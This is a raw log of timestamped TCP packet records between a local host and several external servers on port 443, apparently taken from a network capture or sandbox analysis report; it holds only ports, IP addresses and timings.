                                                                                                                                            Jan 15, 2025 19:14:40.812485933 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812572956 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812602997 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812623024 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812628984 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812671900 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812712908 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812720060 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812874079 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.813071012 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.813711882 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.813723087 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.814002037 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.814065933 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.814716101 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.814730883 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.814836025 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.815120935 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.815130949 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.815428972 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.815439939 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.815823078 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.816179991 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.816266060 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.816292048 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.819439888 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.820579052 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.820600986 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.822122097 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.822185993 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.823120117 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.823201895 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.823255062 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.823265076 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.824922085 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.824959040 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.825237036 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.825237036 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.825264931 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.855334044 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.863326073 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.865339994 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.865431070 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.865432024 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.903453112 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:40.903503895 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.903692961 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:40.903879881 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:40.903901100 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.921963930 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.921993971 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.922156096 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.922440052 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.922454119 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.929384947 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.929589987 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.929660082 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.932389021 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.932431936 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948720932 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948788881 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948826075 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948856115 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948884010 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.948889017 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948916912 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.948930979 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.949328899 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.949377060 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.949383974 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.949395895 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.949423075 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.949453115 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.958332062 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.958379030 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.958451033 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.959106922 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.959137917 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.959636927 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.959660053 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.966842890 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.966870070 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.967010975 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.967516899 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.967541933 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.967875004 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.967912912 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.967981100 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.968322039 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.968337059 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986191034 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986253023 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986293077 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986335039 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986362934 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.986372948 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986388922 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986404896 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.986423016 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.986644030 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.986996889 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.987030029 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.987102032 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.987123013 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.987229109 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.991039991 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007467985 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007600069 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007693052 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007698059 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.007724047 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007766962 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.007783890 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.007973909 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.008025885 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.008032084 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.008133888 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.008193016 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.008198977 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.012479067 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.012553930 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.012561083 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.039568901 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.039602041 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.055495024 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.055519104 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073024988 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073103905 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073143959 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073183060 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.073224068 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073246956 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.073395014 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073437929 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.073446989 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073683977 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073724031 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073762894 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073771954 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.073782921 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.073805094 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.074234009 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.074285984 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.074326992 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.074327946 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.074342966 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.074366093 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.074405909 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.074448109 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.074455976 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075243950 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075283051 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075329065 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075333118 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.075345039 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075372934 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.075397968 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075434923 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075469971 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.075479984 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.075536966 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.083080053 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083173037 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083209038 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083230972 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.083239079 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083259106 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083281994 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.083426952 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083585024 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083606958 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083623886 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.083635092 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.083652020 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.087810040 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.087841034 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.087889910 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.087903976 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.087913036 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.087922096 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.087945938 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.087963104 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.094692945 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.094806910 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.094867945 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.094877005 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.094964027 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095016003 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.095021009 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095058918 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.095257044 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095443964 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095494986 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.095499992 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095913887 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.095972061 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.095977068 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096333981 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096385002 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.096390009 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096494913 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096579075 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096626997 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.096632004 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.096679926 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.096683979 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.097184896 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.097243071 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.097248077 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.097352028 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.097405910 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.097410917 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.098021030 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.098121881 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.098180056 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.098186016 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.098721981 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.158786058 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.158844948 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.158910990 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.159146070 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.159156084 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159533024 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159626961 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159666061 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159691095 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.159710884 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159727097 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159751892 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.159796953 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.159948111 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.159965038 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.160088062 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.160132885 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.160135984 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.160146952 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.160177946 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.160223007 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.160269022 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.160279989 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161192894 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161246061 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161262035 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.161279917 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161317110 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161323071 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.161330938 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.161358118 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.161380053 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.162041903 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.162087917 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.162096977 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.162107944 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.162141085 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.162159920 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.162952900 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163009882 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163017035 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.163028002 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163059950 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.163068056 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163074017 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.163084984 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163109064 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.163130045 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163171053 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.163178921 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.163220882 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.169687986 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169749022 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169778109 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169796944 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.169809103 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169816971 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169847012 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.169858932 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169909954 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.169914961 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169930935 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.169965029 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.170062065 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:41.170078993 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181423903 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.181526899 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181638002 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.181708097 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.181729078 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181790113 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.181868076 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.181902885 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182034016 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.182064056 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182110071 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182127953 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.182199001 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.182219982 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182291985 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182332039 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.182352066 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.182353973 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182374954 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182497978 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182600975 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182615042 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.182631969 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182682037 CET49884443192.168.2.16104.18.68.40
